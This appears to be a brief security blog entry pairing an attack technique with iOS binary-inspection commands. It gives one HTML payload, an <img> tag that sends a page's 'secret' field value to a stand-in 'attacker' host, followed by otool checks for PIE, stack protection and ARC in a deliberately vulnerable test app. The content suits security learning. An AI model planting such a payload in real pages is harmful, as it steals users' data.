Technique, Tool and Lecture #15

Technique:

Steal information with an <img> element

<img src=”http://attacker/”+document.getElementById(‘secret&#8217;).value>

(Source HERE)

Tool:

otool which is from Apple

Source Code (Link HERE)

Some important uses for it, when testing an iOS App:

otool -hv DamnVulnerableIOSApp | make sure PIE is there

otool -L <binary> | Check Shared Libraries for Vulnerabilities

otool -f binary | check fat headers

otool -Iv DamnVulnerableIOSApp | grep stack

You’re looking for __stack_chk_fail and __stack_chk_guard

_objc_release
_objc_storeStrong
_objc_releaseReturnValue
_objc_autoreleaseReturnValue
_objc_retainAutoreleasedReturnValue

otool -Iv DamnVulnerableIOSApp | grep release

ARC Binary Check you’re looking for_objc_retain, _objc_release, _objc_storeStrong, _objc_releaseReturnValue,
_objc_autoreleaseReturnValue ,_objc_retainAutoreleasedReturnValue

Lecture:

Check out all the entries of this series!

END TRANSMISSION

Leave a Reply